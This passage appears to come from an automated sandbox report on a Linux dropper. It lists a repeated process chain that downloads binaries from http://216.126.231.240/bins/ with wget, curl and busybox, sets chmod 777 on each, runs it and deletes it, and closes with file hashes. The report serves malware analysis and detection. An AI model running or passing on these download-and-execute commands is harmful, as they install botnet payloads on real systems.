PID:873
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:876
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:877
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:879
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:885
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:891
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:897
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:903
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:911
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:917
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:923
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:929
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:937
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:943
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:949
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:952
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97